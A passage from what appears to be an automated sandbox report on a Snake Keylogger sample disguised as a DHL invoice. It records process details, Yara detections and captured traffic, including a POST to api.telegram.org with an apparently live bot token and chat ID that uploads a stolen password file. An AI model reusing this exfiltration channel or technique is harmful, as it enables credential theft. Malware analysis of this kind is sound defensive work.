2024-12-20 09:22:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:23:01 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-20 09:23:01 UTC	858	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:23:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1370 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQDZkrnssYUaSEwI8fI9%2BVuLrc3qCK0NxVuEqDlnTYdaEfs%2BPalQILHX%2BZDTnYee5WyZ%2F54w8zkhAb8Y5S6XzGhir5H7TV1D7boTTe%2FfAYzA77M%2BRIitbZHkGT1f32cfiePnZmko"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e923fa9fc0f79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1471&rtt_var=574&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1871794&cwnd=241&unsent_bytes=0&cid=83ac41f09792993b&ts=480&x=0"
2024-12-20 09:23:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49769	149.154.167.220	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:23:08 UTC	350	OUT	POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd21e85383b951 Host: api.telegram.org Content-Length: 569 Connection: Keep-Alive
2024-12-20 09:23:08 UTC	569	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 65 38 35 33 38 33 62 39 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 30 2f 31 32 2f 32 30 32 34 20 2f 20 30 34 3a 32 32 3a 33 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 Data Ascii: --------------------------8dd21e85383b951Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:965543Date and Time: 20/12/2024 / 04:22:36Client IP:
2024-12-20 09:23:09 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 20 Dec 2024 09:23:09 GMT Content-Type: application/json Content-Length: 514 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-20 09:23:09 UTC	514	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 34 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 37 34 39 34 37 38 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 61 72 62 74 72 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 72 62 74 72 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 37 33 38 30 32 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 72 61 63 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6c 74 6f 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 75 67 79 74 72 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 38 36 35 38 39 2c 22 64 6f 63 75 6d Data Ascii: {"ok":true,"result":{"message_id":2483,"from":{"id":8174947883,"is_bot":true,"first_name":"arbtr_bot","username":"arbtrs_bot"},"chat":{"id":6287380231,"first_name":"Grace","last_name":"Milton","username":"iugytr","type":"private"},"date":1734686589,"docum

Target ID:	0
Start time:	04:22:00
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe"
Imagebase:	0x80000
File size:	45'056 bytes
MD5 hash:	1147FDF9A4F5F4DCDBDD6C080C88E083
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2050649719.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:22:35
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x50000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.0000000002659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2940130567.0000000002411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2%
Total number of Nodes:	304
Total number of Limit Nodes:	4

Executed Functions

Function 05C24661 Relevance: 16.1, Strings: 12, Instructions: 1147COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C24FAA
,bq, xrefs: 05C2512A
$^q, xrefs: 05C24B77
$^q, xrefs: 05C24F41
$^q, xrefs: 05C24F9A
$^q, xrefs: 05C24903
$^q, xrefs: 05C24F51
4, xrefs: 05C25045
$^q, xrefs: 05C24AB7
$^q, xrefs: 05C24AC7
$^q, xrefs: 05C24B67
$^q, xrefs: 05C248F3

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 6f200b195c978c46f90e895f5ef0c03591a24974d6623432fd7180137a115868
Instruction ID: 7879dff64998343cf78ba224aaeb7bc4a1890031ea67be6e895650de98887c13
Opcode Fuzzy Hash: 6f200b195c978c46f90e895f5ef0c03591a24974d6623432fd7180137a115868
Instruction Fuzzy Hash: 69B20834A00228CFDB18CFA9C894BADB7B6BF88700F158595E505AB3A5DB71ED85CF50

Function 05C24997 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C2512A
$^q, xrefs: 05C24F41
$^q, xrefs: 05C24F9A
4, xrefs: 05C25045
$^q, xrefs: 05C24AB7
$^q, xrefs: 05C24B67

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: d03a4fbc66f7995db4549ccc535d502671d51b94953ea33d4a23569c533b8375
Instruction ID: 673000c6d3e348b589936a3a318d5508b9fe6fdd8a423204ea94e6d2ef16670e
Opcode Fuzzy Hash: d03a4fbc66f7995db4549ccc535d502671d51b94953ea33d4a23569c533b8375
Instruction Fuzzy Hash: FD220C34A00228CFDB28DF65C994BADB7B6FF88301F158499E509AB295DB71ED81CF50

Function 05394FE8 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 0539570B
xbaq, xrefs: 05395115
pbq, xrefs: 05395BA2
TJcq, xrefs: 0539518A

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$xbaq
API String ID: 0-1954897716
Opcode ID: 6f5af0e0c00e8a7c42bd610a4f7d482c947800f28b65712ca36df9e8016353c7
Instruction ID: a285d944611e8a096b7d9050b37e39ef36227de34a12fa22fa5992f75a7a5a40
Opcode Fuzzy Hash: 6f5af0e0c00e8a7c42bd610a4f7d482c947800f28b65712ca36df9e8016353c7
Instruction Fuzzy Hash: 18A2A775A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40

Function 053973C8 Relevance: 3.8, Strings: 2, Instructions: 1339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05397A3A
2, xrefs: 053983B6

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: 30dd8e68154c903a526c2a814adc47c07aa1a716b29106fd326df5dda2bd21cd
Instruction ID: 4d6fd21202312d38aec38c40fc968925dc2376b4fcb6623c4a3b23bfa38c79e2
Opcode Fuzzy Hash: 30dd8e68154c903a526c2a814adc47c07aa1a716b29106fd326df5dda2bd21cd
Instruction Fuzzy Hash: 71E2B274A04228CFDB64DF68D884B9EBBF6FB89301F1081AAD509A7395DB305E85CF51

Function 0523B448 Relevance: 3.1, Strings: 2, Instructions: 617
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 0523B562
fcq, xrefs: 0523B575

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: fcq$8
API String ID: 0-89531850
Opcode ID: aa673396a6b4836b572c01732f920ca47d1523e55f2a3f5442136fe4cbf09936
Instruction ID: 537975ed590b42ed58b7bdf8b2a512b7d1e90e0e1d89f85907cb71cd53fe133a
Opcode Fuzzy Hash: aa673396a6b4836b572c01732f920ca47d1523e55f2a3f5442136fe4cbf09936
Instruction Fuzzy Hash: 1652E475E00229CFDB64DF68C895AD9B7B2BF89300F5086AAD50DA7355DB30AE81CF50

Function 00A51C21 Relevance: 2.7, Strings: 2, Instructions: 170COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00A51CE7
4'^q, xrefs: 00A51D12

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: c294b685ce85980a10746eab97a6778793dd2373ef65cbd5c4330584672f8382
Instruction ID: 01a83cd469c0474ceec4f20c1ec9b02291e5920cd0af58578e4e0c4b94c0a9e1
Opcode Fuzzy Hash: c294b685ce85980a10746eab97a6778793dd2373ef65cbd5c4330584672f8382
Instruction Fuzzy Hash: 74711C71E042048FE708EF7AE885699BBF6BFC5304F18C529D4099B379EB30590ADB41

Function 0523B438 Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

h, xrefs: 0523B556
fcq, xrefs: 0523B575

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: acd524337fe8234cb56f4e215bf4e9af1dfe44899aefac6c2462857fdcad7b77
Instruction ID: 779ca6bda908ff20ddcf9d6134ed7ad745dfe166d9b3929af3e99fa53005a9f0
Opcode Fuzzy Hash: acd524337fe8234cb56f4e215bf4e9af1dfe44899aefac6c2462857fdcad7b77
Instruction Fuzzy Hash: A0710471E00629CBDB24DF69C895BDAB7B2FF89300F40C2AAD51DA7294DB305A85CF50

Function 00A51C30 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00A51CE7
4'^q, xrefs: 00A51D12

Memory Dump Source

Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 696de9c4240023f0ced4a332155bb10720a8cf990fd2a7655d3908c070f99630
Instruction ID: 24ca621a3c7201a469311af8d8cc359d1dc0eac59a13eaa77b1fe9da948370e0
Opcode Fuzzy Hash: 696de9c4240023f0ced4a332155bb10720a8cf990fd2a7655d3908c070f99630
Instruction Fuzzy Hash: 94710D70A042048FE708EF7AE984699BBF6BFC5304F18C529D4099B379EB70594ADB41

Function 05C200D9 Relevance: 1.6, Strings: 1, Instructions: 393COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C203BB

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: cb68be121ed1a4451932d2f4670bc4a7b147a43de593030338f43518c905c816
Instruction ID: 79e9f240c95f86437fbcf63608dc4af48bf81191e61bf713aed5f14af50bddeb
Opcode Fuzzy Hash: cb68be121ed1a4451932d2f4670bc4a7b147a43de593030338f43518c905c816
Instruction Fuzzy Hash: CC02E370A04228CFDB64DF69C889BAEB7F2FB49300F1085AAD509A7765DB705E84CF50

Function 0523ED08 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0523ED99

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 50e4a955cf3cf9ce973dcda3a24baadf58d18788579d4a62ec75ad8647bf334b
Instruction ID: 45eaf8ff2649d7b1fc073d461072c51bf33d593d5ad2327666acbdc613bae1fb
Opcode Fuzzy Hash: 50e4a955cf3cf9ce973dcda3a24baadf58d18788579d4a62ec75ad8647bf334b
Instruction Fuzzy Hash: 862120B1D003499FCB10CFAAD984ADEFBF5FF48310F20842AE419A7210C735A944CBA4

Function 0523ED10 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0523ED99

Memory Dump Source

Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 9cd35edeb5408e8103b37fa53c0e4e011b6641d0e8b89cf618318de30b067c7f
Instruction ID: 784c8574d72f2345c8884444beb3663d7c8ed8dc0297ff1e59a238af157e8e4c
Opcode Fuzzy Hash: 9cd35edeb5408e8103b37fa53c0e4e011b6641d0e8b89cf618318de30b067c7f
Instruction Fuzzy Hash: 9921E0B1D013499FCB10DFAAD984ADEFBF9FF48310F20842AE519A7250C775A944CBA5

Function 052E1370 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 052E13DE

Memory Dump Source

Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true

Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 49da5a2f44914b93fec9e1a5b818d49407842c9987fcc8c963a1a17b8b4ddfc2
Instruction ID: b13d86728166e416cda6471cbbc4821c538c7f2c816284f33d9469c2a7e495d3
Opcode Fuzzy Hash: 49da5a2f44914b93fec9e1a5b818d49407842c9987fcc8c963a1a17b8b4ddfc2
Instruction Fuzzy Hash: 2D11E4B1D003498FDB14DFAAC484ADEFBF4EF88324F50842AD459A7250CB78A944CFA5

Function 05C21110 Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C214B0

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: f293e548dfdeb0855121dfa90a7d4de7120f63f8bcce5677246d7da793456bdf
Instruction ID: 6184fd7cf025a481336fe9295d191bd85548d1335989e1329c87bf0d9889bfec
Opcode Fuzzy Hash: f293e548dfdeb0855121dfa90a7d4de7120f63f8bcce5677246d7da793456bdf
Instruction Fuzzy Hash: 3BB11474E04228CFEB24DFAAD884BADBBF6BF89300F1494A9D419A7255DB705985CF40

Function 05C21100 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C214B0

Memory Dump Source

Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: dd619df8b9880049516f20a3fb9d7eea5d8785b19d58c2967b1b4861a50ceffb
Instruction ID: 24befd5479ecf44c861f587c51aa611f4ff6f121aa4a6baba52e73d4e53831db
Opcode Fuzzy Hash: dd619df8b9880049516f20a3fb9d7eea5d8785b19d58c2967b1b4861a50ceffb
Instruction Fuzzy Hash: 43B11774E04228CFDB24DFAAD884BADBBF2BF49300F1494A9D419A7355DB705A85CF41

Function 05C17CB8 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C17E5C

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 4a90306460f40c414478d0fae0ce6fe2adcd23b6f082e234abcd4557c6d3259a
Instruction ID: 4f4881e86ed4a3743d528e7f0b605c94d3f1412121e28b09cd829906c119685c
Opcode Fuzzy Hash: 4a90306460f40c414478d0fae0ce6fe2adcd23b6f082e234abcd4557c6d3259a
Instruction Fuzzy Hash: A3A1E774E04218CFDB14DFAAD884BADBBF2FF8A304F208469D809A7255DB749946DF04

Function 05C17CA9 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05C17E5C

Memory Dump Source

Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: ba070c22dc3db5ced4b78ef469decdc60dcb63bb0b83d118ab3aba58443cc369
Instruction ID: b5bb463c8c5c232465a9975f2bb9d68dfdfa4959304885fbfc1a5d8c5e2004e3
Opcode Fuzzy Hash: ba070c22dc3db5ced4b78ef469decdc60dcb63bb0b83d118ab3aba58443cc369
Instruction Fuzzy Hash: 55A1E674E04218CFDB14DFA9D884BADBBF2FF8A300F248469E809A7265DB749945DF04

Function 05398D3B Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6288fc8b9ee086c5948c58029382f97ea3fc32647770737e1953c810f510e9a5
Instruction ID: 74dca8829df21ebe9f5131e035b46697d30b99a65133b6927db74a2d424f7a28
Opcode Fuzzy Hash: 6288fc8b9ee086c5948c58029382f97ea3fc32647770737e1953c810f510e9a5
Instruction Fuzzy Hash: 4452B4B4A04228CFCB64DF28C984B9ABBB6FB89301F1085D9D50DA7355DB30AE85CF51

Function 05F7F7BF Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67eed09a96a9d87f629d51cc54632721b4b17f496c6fa1a1311a17b613b6740e
Instruction ID: 64aaa31bcd82321485005cb7a1ae2a7fbbc84d945021a79b7ee0c51818784230
Opcode Fuzzy Hash: 67eed09a96a9d87f629d51cc54632721b4b17f496c6fa1a1311a17b613b6740e
Instruction Fuzzy Hash: 1C02F371A05218CFDB64EF68D884BAEBBF6FB49300F5081AAD409A7395DB345E85CF11

Function 05F7D556 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false

Joe Sandbox IDA Plugin

